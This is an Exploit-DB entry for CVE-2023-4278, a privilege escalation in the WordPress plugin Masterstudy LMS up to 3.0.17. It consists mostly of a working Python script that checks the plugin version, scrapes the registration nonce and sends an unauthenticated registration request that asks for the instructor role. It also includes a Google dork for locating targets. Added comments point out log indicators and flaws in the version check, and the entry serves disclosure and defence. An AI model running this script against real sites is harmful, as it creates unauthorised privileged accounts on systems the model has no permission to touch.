WordPress Plugin Masterstudy LMS – 3.0.17 – Unauthenticated Instructor Account Creation

  • 作者: Revan Arifio
    日期: 2023-10-09
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51735/
  • # Exploit Title:WordPress Plugin Masterstudy LMS - 3.0.17 - Unauthenticated Instructor Account Creation
    # Google Dork: inurl:/user-public-account
    # Date: 2023-09-04
    # Exploit Author: Revan Arifio
    # Vendor Homepage: https://wordpress.org/plugins/masterstudy-lms-learning-management-system/
    # Version: <= 3.0.17
    # Tested on: Windows, Linux
    # CVE : CVE-2023-4278
    
    import requests
    import os
    import re
    import time
    
    # ASCII-art banner shown at start-up. The multi-line string is runtime output
    # (it is printed below), so its contents are kept exactly as written.
    banner = """
     __________________ ___ _________ ___ ______ ___
    / ____\ \/ /____||__ \ / _ \__ \|___ \| || |__ \____/ _ \ 
     | | \ \/ /| |__ ______ ) | | | | ) | __) |_____| || |_ ) |/ / (_) |
     | |\ \/ / |__|______/ /| | | |/ / |__ <______|__ _/ // / > _ < 
     | |____ \/| |____/ /_| |_| / /_ ___) || |/ /_ / / | (_) |
    \_____| \/ |______||____|\___/____|____/ |_|____/_/ \___/ 
    
    ======================================================================================================
    || Title: Masterstudy LMS <= 3.0.17 - Unauthenticated Instructor Account Creation ||
    || Author : https://github.com/revan-ar ||
    || Vendor Homepage: https:/wordpress.org/plugins/masterstudy-lms-learning-management-system/||
    || Support: https://www.buymeacoffee.com/revan.ar ||
    ======================================================================================================
    
    """


    # Module-level side effect: the banner is printed on import/run, before any input is read.
    print(banner)
    
    # get nonce
    def get_nonce(target):
        """Scrape the ``stm_lms_register`` nonce from the target's public-account page.

        Args:
            target: Base URL of the WordPress site (scheme and host, no trailing slash);
                it is concatenated directly into the request URL.

        Returns:
            The first capture of the ``"stm_lms_register":"..."`` pattern found in the
            response body. Falls through (returning None) only via the ``else`` branch.

        Note:
            When the pattern is absent ``re.search`` returns None, and subscripting it
            (``search_nonce[1]``) raises TypeError before the ``else`` branch is reached,
            so the "Failed" message below is effectively unreachable.
        """
        # Reconnaissance step: an unauthenticated GET of /user-public-account. From a
        # defender's view this page fetch followed by the admin-ajax POST in privesc()
        # is the request sequence to look for in web-server logs.
        open_target = requests.get("{}/user-public-account".format(target))
        # The nonce is taken from a JSON-like fragment in the page markup; a nonce
        # obtainable this way is a CSRF token, not an authentication check.
        search_nonce = re.search('"stm_lms_register":"(.*?)"', open_target.text)
        if search_nonce[1] != None:
            return search_nonce[1]
        else:
            print("Failed when getting Nonce :p")
    
    
    
    # privilege escalation
    def privesc(target, nonce, username, password, email):
        """Submit a registration request that asks for the instructor role.

        Args:
            target: Base URL of the WordPress site.
            nonce: Value obtained by get_nonce(); passed in the query string.
            username: Login name for the account being registered.
            password: Password for that account (sent twice, as the form does).
            email: E-mail address for that account.

        Returns:
            None. The outcome is only printed.

        Note:
            Success is judged solely on an HTTP 200 status; the response body is never
            inspected, so a 200 by itself does not prove that an account was created or
            that the instructor role was granted.
        """
        # JSON body mirroring the plugin's registration form. The field that carries
        # the reported issue is ``become_instructor``: a self-registration that also
        # requests the instructor role. The remaining profile fields are sent empty.
        req_data = {
            "user_login": "{}".format(username),
            "user_email": "{}".format(email),
            "user_password": "{}".format(password),
            "user_password_re": "{}".format(password),
            "become_instructor": True,
            "privacy_policy": True,
            "degree": "",
            "expertize": "",
            "auditory": "",
            "additional": [],
            "additional_instructors": [],
            "profile_default_fields_for_register": [],
            "redirect_page": "{}/user-account/".format(target)
        }

        # Unauthenticated POST to admin-ajax.php with action=stm_lms_register.
        # Detection: this action name combined with ``"become_instructor": true`` in the
        # JSON body, from a client that never authenticated, is the observable indicator
        # of this script in access or WAF logs.
        start = requests.post("{}/wp-admin/admin-ajax.php?action=stm_lms_register&nonce={}".format(target, nonce), json = req_data)

        if start.status_code == 200:
            print("[+] Exploit Success !!")
        else:
            print("[+] Exploit Failed :p")
    
    
    
    # URL target
    # URL target
    target = input("[+] URL Target: ")
    print("[+] Starting Exploit")
    # Version fingerprint: the plugin's public readme.txt is fetched and its
    # "Stable tag" line is read as the installed version. The check depends on that
    # file being readable; if the pattern is not found, ``plugin_version`` is None and
    # the subscript two lines below raises TypeError instead of printing a verdict.
    plugin_check = requests.get("{}/wp-content/plugins/masterstudy-lms-learning-management-system/readme.txt".format(target))
    plugin_version = re.search("Stable tag: (.+)", plugin_check.text)
    # Dots are stripped and the remainder compared numerically against 3018 (i.e.
    # "3.0.18"), so anything below 3.0.18 is reported vulnerable. This is not a real
    # version comparison: "3.1.0" becomes 310 < 3018 and would be misreported, so
    # treat the verdict as a heuristic. Mitigation per the header: run a plugin
    # version later than 3.0.17.
    int_version = plugin_version[1].replace(".", "")
    time.sleep(1)

    if int(int_version) < 3018:
        print("[+] Target is Vulnerable !!")
        # Credential
        email = input("[+] Email: ")
        username = input("[+] Username: ")
        password = input("[+] Password: ")
        time.sleep(1)
        print("[+] Getting Nonce...")
        # NOTE: this rebinds the name ``get_nonce`` from the function to its return
        # value; harmless here only because the function is not called again.
        get_nonce = get_nonce(target)
        # Get Nonce
        if get_nonce != None:
            print("[+] Success Getting Nonce: {}".format(get_nonce))
            time.sleep(1)
            # Start PrivEsc
            privesc(target, get_nonce, username, password, email)
            # ----------------------------------

    else:
        print("[+] Target is NOT Vulnerable :p")